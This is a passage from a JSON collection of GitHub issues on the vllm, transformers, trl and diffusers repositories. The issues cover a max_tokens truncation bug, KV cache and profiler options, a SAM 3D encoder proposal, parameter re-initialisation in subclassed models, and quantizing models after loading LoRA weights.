tokens..\nIt seems that starting from vllm 0.11+ version, the auto-truncation using the `max_tokens` has stopped working\n\n```json\n{\n \"id\": \"chatcmpl-61b60144d43147e2b007158712ad4920\",\n \"object\": \"chat.completion\",\n \"created\": 1764300423,\n \"model\": \"openai/gpt-oss-120b\",\n \"choices\": [\n {\n \"index\": 0,\n \"message\": {\n \"role\": \"assistant\",\n \"content\": \"**The role of AI in medicine is expanding rapidly and touches virtually every aspect of healthcare\u2014from the way doctors diagnose patients to how hospitals run their operations.** Below is a structured overview that covers the major domains, concrete examples, benefits, challenges, and future directions.\\n\\n---\\n\\n## 1. Clinical Care\\n\\n| Sub\u2011area | What AI Does | Real\u2011World Examples | Benefits |\\n|----------|--------------|---------------------|----------|\\n| **Diagnostics** | Image analysis, pattern recognition, risk stratification | \u2022 Radiology: Google\u202fDeepMind\u2019s AI detects lung cancer on CT scans with >95% accuracy.
\u2022 Dermatology: FDA\u2011cleared apps (e.g., SkinVision) classify skin lesions from photos.
\u2022 Pathology: Paige.ai assists in detecting prostate cancer in biopsy slides. | Faster, more consistent readings; can catch subtle findings that human eyes miss. |\\n| **Predictive Analytics** | Forecast disease onset, complications, readmission risk | \u2022 Sepsis prediction models (e.g., Epic Sepsis Model) trigger alerts hours before clinical signs.
\u2022 Cardiovascular risk calculators incorporating genomics and wearables. | Enables proactive interventions, reduces morbidity and cost. |\\n| **Treatment Planning** | Decision support, dose optimisation, drug selection | \u2022 IBM Watson for Oncology (clinical trial matching).
\u2022 Radiation oncology: AI\u2011driven dose\u2011painting to spare healthy tissue.
\u2022 Pharmacogenomics: AI predicts drug\u2011gene interactions. | Personalises therapy, improves outcomes, reduces adverse events. |\\n| **Robotics & Minimally Invasive Surgery** | Real\u2011time image guidance, autonomous suturing, task automation | \u2022 Da Vinci Surgical System (augmented with AI for instrument tracking).
\u2022 VERDICT AI for autonomous suturing in animal models. | Increases precision, reduces surgeon fatigue, shortens recovery. |\\n\\n---\\n\\n## 2. Patient\u2011Facing Applications\\n\\n| Application | Description | Example |\\n|-------------|-------------|---------|\\n| **Virtual Assistants & Chatbots** | Symptom triage, medication reminders, mental\u2011health chat | \u2022 Babylon Health (AI\u2011driven triage).
\u2022 Woebot (CBT\u2011based mental\u2011health chatbot). |\\n| **Telemedicine Enhancements** | Real\u2011time vitals extraction from video, automated note\u2011taking | \u2022 KardiaMobile ECG integration with AI\u2011based arrhythmia detection. |\\n| **Wearables & Remote Monitoring** | Continuous data streams analysed for early alerts | \u2022 Apple Watch ECG + AI arrhythmia detection; Fitbit heart\u2011rate trend alerts. |\\n\\n---\\n\\n## 3. Operational & Administrative Efficiency\\n\\n| Domain | AI Functions | Example |", "url": "https://github.com/vllm-project/vllm/issues/29641", "state": "closed", "labels": [ "bug" ], "created_at": "2025-11-28T03:39:34Z", "updated_at": "2025-12-21T02:39:32Z", "comments": 16, "user": "soodrohit" }, { "repo": "huggingface/transformers", "number": 42464, "title": "Add SAM 3D Objects Encoder", "body": "### Model description\n\n## Model Description\n\nSAM 3D Objects is Meta AI's foundation model for 3D object reconstruction from single images. I'm proposing to add the **encoder component** (DINOv2-based Vision Transformer) to Transformers.\n\n**Scope**: Encoder only, not the full 3D generation pipeline (which includes Gaussian Splatting/Mesh decoders better suited for Diffusers).\n\n## Open source status\n\n- [x] The model implementation available\n- [x] The model weights are available\n\n## Provide useful links for the implementation\n\n- **Model Card**: https://huggingface.co/facebook/sam-3d-objects\n- **Paper**: https://arxiv.org/abs/2511.16624\n- **Original Repository**: https://github.com/facebookresearch/sam-3d-objects\n- **Blog Post**: https://ai.meta.com/blog/sam-3d/\n\n## Implementation Progress\n\nI have already implemented this model and it's ready for review:\n\n\u2705 **Implementation Complete:**\n- `Sam3DObjectsEncoderConfig` - Configuration with DINO variant support\n- `Sam3DObjectsEncoder` - Main encoder model\n- `Sam3DObjectsEncoderForMasks` - Variant for mask encoding\n- `Sam3DObjectsImageProcessor` - Image preprocessing\n- Comprehensive test suite: **28/28 tests passing**\n- Full documentation\n\n**Test Results:**\ncollected 29 items\n28 passed, 1 skipped in 4.92s\n\n**Example Usage:**\n```python\nfrom transformers.models.sam3d_objects import (\n Sam3DObjectsEncoder,\n Sam3DObjectsEncoderConfig,\n Sam3DObjectsImageProcessor,\n)\n\nconfig = Sam3DObjectsEncoderConfig.from_dino_config(\"dinov2_vitl14\")\nmodel = Sam3DObjectsEncoder(config)\nprocessor = Sam3DObjectsImageProcessor()\n\ninputs = processor(images=image, return_tensors=\"pt\")\noutputs = model(**inputs)\nembeddings = outputs.last_hidden_state\n```\n\n## Questions\n\n1. Is there interest in adding the SAM 3D Objects Encoder to Transformers?\n2. Should this be limited to the encoder component (my recommendation)?\n3. 
Should I submit a PR, or are there any requirements I should address first?\n\n## Additional Context\n\n- The encoder is based on DINOv2 and fits naturally in Transformers\n- Full 3D generation pipeline would be better suited for Diffusers\n- Model is gated on Hub (requires license acceptance)\n- Implementation follows Transformers patterns and guidelines\n\nI'm ready to submit a PR and address any feedback.\n\n### Open source status\n\n- [x] The model implementation is available\n- [x] The model weights are available\n\n### Provide useful links for the implementation\n\n## Links\n\n- **Model Card**: https://huggingface.co/facebook/sam-3d-objects\n- **Paper**: https://arxiv.org/abs/2511.16624 (SAM 3D: 3Dfy Anything in Images)\n- **Original Repository**: https://github.com/facebookresearch/sam-3d-objects\n- **Blog Post**: https://ai.meta.com/blog/sam-3d/\n- **Project Page**: https://ai.meta.com/sam3d/\n\n## Authors\n\n**SAM 3D Team** from Meta AI\n\nFor the complete author list and contributions, see:\n- [ArXiv Paper](https://arxiv.org/abs/2511.16624)\n- [Original Repository](https://github.com/facebookresearch/sam-3d-objects)\n\n*Note: This is a large collaborative project with many contributors from Meta Superintelligence Labs.*\n\n## Implementation Details\n\n**Model Type**: Vision Encoder (DINOv2-based) \n**Architecture**: Vision Transformer (ViT) \n**Variants Supported**: \n- ViT-S/14 (384 dim)\n- ViT-B/14 (768 dim)\n- ViT-L/14 (1024 dim)\n- ViT-G/14 (1536 dim)\n\n**Input**: RGB images (224x224 or 518x518) \n**Output**: Visual embeddings for 3D generation tasks\n\n**License**: SAM License (gated model on HuggingFace Hub)", "url": "https://github.com/huggingface/transformers/issues/42464", "state": "open", "labels": [ "New model" ], "created_at": "2025-11-27T19:48:28Z", "updated_at": "2025-12-05T10:32:33Z", "comments": 1, "user": "Aznix07" }, { "repo": "vllm-project/vllm", "number": 29584, "title": "[Usage]: Can KV Cache be disabled in non-autoregressive generation tasks?", "body": "### Your current environment\n\n```text\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 3.28.3\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.15 (main, Oct 3 2024, 07:27:34) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-6.8.0-87-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : Could not collect\nCUDA_MODULE_LOADING set to :\nGPU models and configuration :\nGPU 0: NVIDIA GeForce RTX 3090\nGPU 1: NVIDIA GeForce RTX 3090\n\nNvidia driver version : 575.57.08\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n vLLM Info\n==============================\nROCM Version : Could not collect\nvLLM Version : 0.11.2\nvLLM Build Flags:\n CUDA Archs: Not Set; ROCm: Disabled\nGPU Topology:\n GPU0 GPU1 CPU Affinity NUMA Affinity GPU NUMA ID\nGPU0 X SYS 0-23,48-71 0 N/A\nGPU1 SYS X 24-47,72-95 1 N/A\n\nLegend:\n\n X = Self\n SYS = 
Connection traversing PCIe as well as the SMP interconnect between NUMA nodes (e.g., QPI/UPI)\n NODE = Connection traversing PCIe as well as the interconnect between PCIe Host Bridges within a NUMA node\n PHB = Connection traversing PCIe as well as a PCIe Host Bridge (typically the CPU)\n PXB = Connection traversing multiple PCIe bridges (without traversing the PCIe Host Bridge)\n PIX = Connection traversing at most a single PCIe bridge\n NV# = Connection traversing a bonded set of # NVLinks\n```\n\n### How would you like to use vllm\n\nHello vLLM team,\n\nCurrently, vLLM (v0.11.2) enables KV cache for certain LLM-based pooling and reranking models, such as the Qwen3-Embedding series, even when `--no-enable-chunked-prefill` and `--no-enable-prefix-caching` are set. This leads to unnecessary GPU memory usage.\n\nWould it be possible to disable KV cache for pooling and reranking models under these conditions?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29584", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-27T05:30:08Z", "updated_at": "2025-12-05T02:40:28Z", "comments": 5, "user": "GitEventhandler" }, { "repo": "vllm-project/vllm", "number": 29574, "title": "[Performance]: Using vLLM to accelerate VLM models, does the vision encoding part currently support parallel processing, or is it still being processed serially?", "body": "### Proposal to improve performance\n\nI found that currently, images of different sizes are processed sequentially, which significantly slows down the processing speed. How can we adapt to parallel processing? Should we resize or pad all images to the same size for batch processing, or can we run multiple encoder models in parallel? Thank you.\n\n### Report of performance regression\n\n_No response_\n\n### Misc discussion on performance\n\n_No response_\n\n### Your current environment (if you think it is necessary)\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29574", "state": "open", "labels": [ "performance" ], "created_at": "2025-11-27T03:51:36Z", "updated_at": "2025-11-27T10:54:09Z", "comments": 2, "user": "NewZxy" }, { "repo": "vllm-project/vllm", "number": 29564, "title": "[Doc]: Make PyTorch profiler gzip and CUDA time dump configurable", "body": "### \ud83d\udcda The doc issue\n\nWe observed that enabling both use_gzip and dump_self_cuda_time_total in the vLLM torch profiler introduces significant overhead during profiling.\n\nFor example, when profiling 10 randomly generated requests (1000 input tokens, 200 output tokens) on an A100 using the Qwen3-32B model, we found that gzip compression of the profiling trace and dumping the CUDA time table take ~68 seconds, dominating the overall profiling time.\n\nThe main sources of overhead appear to be:\n1. Gzip compression of the profiling trace file\n2. 
Generation and dumping of the CUDA time summary table\n\nAfter disabling these two features, the total profiling dump time is reduced to ~18 seconds.\n\nIn many profiling scenarios (e.g., quick performance checks or small-scale experiments), users may not need gzip compression or the CUDA time table. Therefore, it would be helpful to make these two behaviors individually configurable via environment variables: enabled by default for completeness, but optionally turned off when faster profiling turnaround is preferred. Moreover, gzip compression could potentially be performed asynchronously after the trace is dumped, allowing lower-latency profiling in staging or pre-production environments.\n\nThis patch proposes adding such configurability so users can selectively disable gzip compression and/or CUDA time table generation when they want a faster and lighter profiling workflow.\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29564", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-11-27T02:21:20Z", "updated_at": "2025-12-01T04:30:48Z", "comments": 1, "user": "zhangruoxu" }, { "repo": "vllm-project/vllm", "number": 29562, "title": "[Bug]: \"\\n\\n\" content between reasoning and tool_call content when tool_call and stream mode", "body": "### Your current environment\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nhttps://github.com/QwenLM/Qwen3/issues/1755\n\nWhen stream mode true, the response contains content \"\\n\\n\" between reasoning and tool_call; but with stream model false, it didn't generate content \"\\n\\n\".\n\nIs there some thing different, I don't want the content \"\\n\\n\" between reasoning and tool_call.\n\n\"Image\"\n\nHere is my requests:\n```\n{\n \"model\": \"Qwen3-235B-A22B-Thinking-2507\",\n \"tools\": [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"search_law_articles\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"level\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u641c\u7d22\u6761\u4ef6\uff1a\u6cd5\u89c4\u7c7b\u578b\"\n },\n \"query\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u67e5\u8be2\u8bed\u53e5\"\n },\n \"title\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u6cd5\u5f8b\u6807\u9898\"\n },\n \"article\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u6cd5\u5f8b\u6761\u6b3e\u5e8f\u53f7\uff0c\u5982 \u7b2c\u5341\u6761\"\n },\n \"content\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u6cd5\u5f8b\u6761\u6b3e\u53ca\u5185\u5bb9\uff0c\u5982 \u7b2c\u5341\u6761 \u8d37\u6b3e\u4eba\u59d4\u6258\u652f\u4ed8\"\n },\n \"pub_department\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u53d1\u5e03\u90e8\u95e8\"\n },\n \"pub_time_after\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u641c\u7d22\u6761\u4ef6\uff1a\u53d1\u5e03\u65f6\u95f4\u665a\u4e8e\u6b64\u65f6\u95f4\uff0c\u683c\u5f0f\u59822025-06-20\"\n },\n \"pub_time_before\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u641c\u7d22\u6761\u4ef6\uff1a\u53d1\u5e03\u65f6\u95f4\u65e9\u4e8e\u6b64\u65f6\u95f4\uff0c\u683c\u5f0f\u59822025-06-20\"\n },\n \"imply_time_after\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u641c\u7d22\u6761\u4ef6\uff1a\u5b9e\u65bd\u65f6\u95f4\u665a\u4e8e\u6b64\u65f6\u95f4\uff0c\u683c\u5f0f\u59822025-06-20\"\n },\n \"imply_time_before\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u641c\u7d22\u6761\u4ef6\uff1a\u5b9e\u65bd\u65f6\u95f4\u65e9\u4e8e\u6b64\u65f6\u95f4\uff0c\u683c\u5f0f\u59822025-06-20\"\n }\n }\n },\n \"description\": \"\u6b64\u5de5\u5177\u7528\u4e8e\u641c\u7d22\u6cd5\u6761\u5185\u5bb9\uff0c \u5e93\u4e2d\u662f\u6309\u7167\u6cd5\u5f8b\u6761\u76ee\u8fdb\u884c\u5b58\u50a8\uff0c \u67e5\u8be2\u53ef\u9009\u591a\u4e2a\u67e5\u8be2\u8fc7\u6ee4\u6761\u4ef6\"\n }\n }\n ],\n \"stream\": true,\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": [\n {\n \"text\": \"\u5e2e\u6211\u89e3\u8bfb\u4e0b\u7f51\u7edc\u5b89\u5168\u6cd5\",\n \"type\": \"text\"\n }\n ]\n }\n ]\n}\n```\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of 
the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29562", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-27T01:49:04Z", "updated_at": "2025-11-27T01:49:04Z", "comments": 0, "user": "NiuBlibing" }, { "repo": "vllm-project/vllm", "number": 29560, "title": "[Doc]: Batch Invariance on Ampere Platforms", "body": "### \ud83d\udcda The doc issue\n\nDoes the batch invariance feature released in vllm 0.11.2 support the Ampere architecture? If adaptations are required, what modifications need to be made?\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29560", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-11-27T01:06:49Z", "updated_at": "2025-11-27T14:21:30Z", "comments": 0, "user": "luo1206" }, { "repo": "huggingface/trl", "number": 4582, "title": "Does the GRPO Trainer support multi-image input for Qwen3-VL?", "body": "Does the GRPO Trainer support multi-image input for Qwen3-VL?", "url": "https://github.com/huggingface/trl/issues/4582", "state": "open", "labels": [ "\ud83c\udfcb GRPO" ], "created_at": "2025-11-26T14:03:57Z", "updated_at": "2025-11-27T08:08:25Z", "comments": 1, "user": "Lestoky" }, { "repo": "huggingface/diffusers", "number": 12722, "title": "How to run qwen-image in kaggle gpu T4 * 2 successfully?", "body": "```python3\n!python3 -m pip install -U diffusers peft bitsandbytes\nimport diffusers, torch, math\nqwen = diffusers.QwenImagePipeline.from_pretrained('Qwen/Qwen-Image', torch_dtype=torch.float16, low_cpu_mem_usage=True, quantization_config=diffusers.PipelineQuantizationConfig(quant_backend='bitsandbytes_4bit', quant_kwargs={'load_in_4bit':True, 'bnb_4bit_quant_type':'nf4', 'bnb_4bit_compute_dtype':torch.float16}, components_to_quantize=['transformer', 'text_encoder']))\nqwen.scheduler = diffusers.FlowMatchEulerDiscreteScheduler.from_config({'base_image_seq_len':256, 'base_shift':math.log(3), 'invert_sigmas':False, 'max_image_seq_len':8192, 'max_shift':math.log(3), 'num_train_timesteps':1000, 'shift':1, 'shift_terminal':None, 'stochastic_sampling':False, 'time_shift_type':'exponential', 'use_beta_sigmas':False, 'use_dynamic_shifting':True, 'use_exponential_sigmas':False, 'use_karras_sigmas':False})\nqwen.load_lora_weights('lightx2v/Qwen-Image-Lightning', weight_name='Qwen-Image-Lightning-4steps-V2.0.safetensors', adapter_name='lightning')\nqwen.set_adapters('lightning', adapter_weights=1)\nqwen.enable_sequential_cpu_offload()\nqwen(prompt='a beautiful girl', height=1280, width=720, num_inference_steps=4, true_cfg_scale=1).images[0].save('a.png')\n```\n----> 3 qwen = diffusers.QwenImagePipeline.from_pretrained('Qwen/Qwen-Image', torch_dtype=torch.float16, low_cpu_mem_usage=True, quantization_config=diffusers.PipelineQuantizationConfig(quant_backend='bitsandbytes_4bit', quant_kwargs={'load_in_4bit':True, 'bnb_4bit_quant_type':'nf4', 'bnb_4bit_compute_dtype':torch.float16}, components_to_quantize=['transformer', 'text_encoder']))\n\nOutOfMemoryError: CUDA out of memory. Tried to allocate 34.00 MiB. GPU 0 has a total capacity of 14.74 GiB of which 4.19 MiB is free. 
Process 8568 has 14.73 GiB memory in use. Of the allocated memory 14.50 GiB is allocated by PyTorch, and 129.00 MiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation. See documentation for Memory Management (https://pytorch.org/docs/stable/notes/cuda.html#environment-variables)\n\nHow to get more cuda memory?\n\n@yiyixuxu @DN6", "url": "https://github.com/huggingface/diffusers/issues/12722", "state": "open", "labels": [], "created_at": "2025-11-26T12:53:30Z", "updated_at": "2025-11-28T03:54:07Z", "user": "chaowenguo" }, { "repo": "vllm-project/vllm", "number": 29494, "title": "[Doc]: Documentation inconsistency: Blog mentions append_slots() but codebase uses allocate_slots()", "body": "### \ud83d\udcda The doc issue\n\nThe Automatic Prefix Caching blog post mentions:\n> \"The scheduler calls kv_cache_manager.append_slots()\"\n\nHowever, the actual codebase uses a unified `kv_cache_manager.allocate_slots()` method that handles both prefill and decode requests.\n\n**Location:**\n- Blog: [[link to blog post](https://docs.vllm.ai/en/v0.8.5/design/v1/prefix_caching.html#operations)]\n- Code: ./vllm/v1/core/kv_cache_manager.py\n\n### Suggest a potential alternative/fix\n\nUpdate the blog post to reflect the actual implementation `kv_cache_manager.allocate_slots()`\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29494", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-11-26T11:37:40Z", "updated_at": "2025-11-26T11:46:08Z", "comments": 1, "user": "pradsgit" }, { "repo": "huggingface/transformers", "number": 42418, "title": "Custom nn.Parameter initialization in PreTrainedModel subclasses is overwritten by post_init()/from_pretrained() causing NaNs/Zeros", "body": "### System Info\n\n- `transformers` version: 4.57.1\n- Platform: Linux-4.18.0-147.mt20200626.413.el8_1.x86_64-x86_64-with-glibc2.35\n- Python version: 3.10.14\n- Huggingface_hub version: 0.35.3\n- Safetensors version: 0.6.2\n- Accelerate version: 1.11.0\n- Accelerate config: not found\n- DeepSpeed version: 0.18.2\n- PyTorch version (accelerator?): 2.7.1+cu126 (CUDA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: No\n- Using GPU in script?: No\n- GPU type: NVIDIA A100-SXM4-80GB\n\n\n### Who can help?\n\n@Cyrilvallez @zucchini-nlp \n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\nimport numpy as np\nimport os\nimport random\nimport torch\nimport torch.nn as nn\n\nfrom transformers import Qwen3VLForConditionalGeneration\n\n\ndef seed_everything(TORCH_SEED):\n random.seed(TORCH_SEED)\n os.environ[\"PYTHONHASHSEED\"] = str(TORCH_SEED)\n np.random.seed(TORCH_SEED)\n torch.manual_seed(TORCH_SEED)\n torch.cuda.manual_seed(TORCH_SEED)\n torch.cuda.manual_seed_all(TORCH_SEED)\n torch.backends.cudnn.deterministic = True\n 
torch.backends.cudnn.benchmark = False\n\n\nseed_everything(66)\n\n\nclass TestModel1(Qwen3VLForConditionalGeneration):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.action_head = nn.Linear(1024, 7)\n self.positional_embedding = nn.Parameter(torch.randn(16, 1152))\n self.post_init()\n\n\nclass TestModel2(nn.Module):\n def __init__(self, *args, model_path, **kwargs):\n super().__init__(*args, **kwargs)\n self.model = Qwen3VLForConditionalGeneration.from_pretrained(model_path)\n self.action_head = nn.Linear(1024, 7)\n self.positional_embedding = nn.Parameter(torch.randn(16, 1152))\n\n\ntest_model1 = TestModel1.from_pretrained(\"Qwen/Qwen3-VL-4B-Instruct\")\ntest_model2 = TestModel2(model_path=\"Qwen/Qwen3-VL-4B-Instruct\")\nprint(test_model1.positional_embedding)\nprint(test_model1.positional_embedding.mean(), test_model1.positional_embedding.std())\nprint(test_model2.positional_embedding)\nprint(test_model2.positional_embedding.mean(), test_model2.positional_embedding.std())\n````\n\n### Expected behavior\n\nWhen subclassing a model (inheriting from PreTrainedModel, e.g., Qwen3VLForConditionalGeneration, LlamaForCausalLM) to add custom learnable parameters, user-defined initialization in __init__ is often silently overwritten.\n\nThis occurs because from_pretrained (or the end of __init__) triggers self.post_init(), which recursively calls _init_weights. This mechanism re-initializes all parameters, ignoring the explicit initialization code provided by the user in __init__.\n\nIn the specific case of Qwen3-VL (and potentially others), this re-initialization results in NaNs or Zeros, rendering the model unusable without manual intervention.\n\nSteps to reproduce The following script demonstrates the issue. Note: I used torch.randn for the custom parameter initialization. While I understand that torch.randn samples from a standard normal distribution and does not guarantee an exact sample mean of 0 and std of 1, it should result in valid float values. The observed NaNs/Zeros confirm that this initialization is being discarded and replaced by a faulty internal initialization logic.", "url": "https://github.com/huggingface/transformers/issues/42418", "state": "open", "labels": [ "Usage", "Feature request", "bug" ], "created_at": "2025-11-26T10:29:57Z", "updated_at": "2025-12-01T15:10:32Z", "comments": 10, "user": "Noietch" }, { "repo": "huggingface/diffusers", "number": 12720, "title": "how to quantization wan 2.2 vace after loading lora?", "body": "```python3\ndiffusers.WanVACEPipeline.from_pretrained('linoyts/Wan2.2-VACE-Fun-14B-diffusers', vae=diffusers.AutoencoderKLWan.from_pretrained('linoyts/Wan2.2-VACE-Fun-14B-diffusers', subfolder='vae', torch_dtype=torch.float32), torch_dtype=torch.bfloat16, quantization_config=diffusers.PipelineQuantizationConfig(quant_backend='bitsandbytes_8bit', quant_kwargs={'load_in_8bit':True}, components_to_quantize=['transformer', 'transformer_2'])).save_pretrained('wan')\n```\nnormally I can save the quantization model in this way\nBut now I want to merge lora and the quantization and then save the model with lora. 
How?\n\n```python3\nwan = diffusers.WanVACEPipeline.from_pretrained('linoyts/Wan2.2-VACE-Fun-14B-diffusers', vae=diffusers.AutoencoderKLWan.from_pretrained('linoyts/Wan2.2-VACE-Fun-14B-diffusers', subfolder='vae', torch_dtype=torch.float32), torch_dtype=torch.bfloat16)\nwan.load_lora_weights('lightx2v/Wan2.2-Lightning', weight_name='Wan2.2-I2V-A14B-4steps-lora-rank64-Seko-V1/high_noise_model.safetensors', adapter_name='lightning')\nwan.load_lora_weights('lightx2v/Wan2.2-Lightning', weight_name='Wan2.2-I2V-A14B-4steps-lora-rank64-Seko-V1/low_noise_model.safetensors', adapter_name='lightning_2', load_into_transformer_2=True)\nwan.set_adapters(['lightning', 'lightning_2'], adapter_weights=[1] * 2)\n\nhow to quantization and save_pretrained?\n```\n@yiyixuxu @DN6", "url": "https://github.com/huggingface/diffusers/issues/12720", "state": "open", "labels": [], "created_at": "2025-11-26T10:11:38Z", "updated_at": "2025-12-11T17:29:30Z", "user": "chaowenguo" }, { "repo": "vllm-project/vllm", "number": 29489, "title": "[Usage]: Removing last generated token from output and kv cache", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 3.28.3\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.13.5 | packaged by conda-forge | (main, Jun 16 2025, 08:27:50) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-6.8.0-87-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA B200\nGPU 1: NVIDIA B200\nGPU 2: NVIDIA B200\nGPU 3: NVIDIA B200\nGPU 4: NVIDIA B200\nGPU 5: NVIDIA B200\nGPU 6: NVIDIA B200\nGPU 7: NVIDIA B200\n\nNvidia driver version : 570.195.03\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 224\nOn-line CPU(s) list: 0-223\nVendor ID: GenuineIntel\nModel name: INTEL(R) XEON(R) PLATINUM 8570\nCPU family: 6\nModel: 207\nThread(s) per core: 2\nCore(s) per socket: 56\nSocket(s): 2\nStepping: 2\nCPU(s) scaling MHz: 33%\nCPU max MHz: 4000.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4200.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow flexpriority ept vpid ept_ad fsgsbase tsc_adjust 
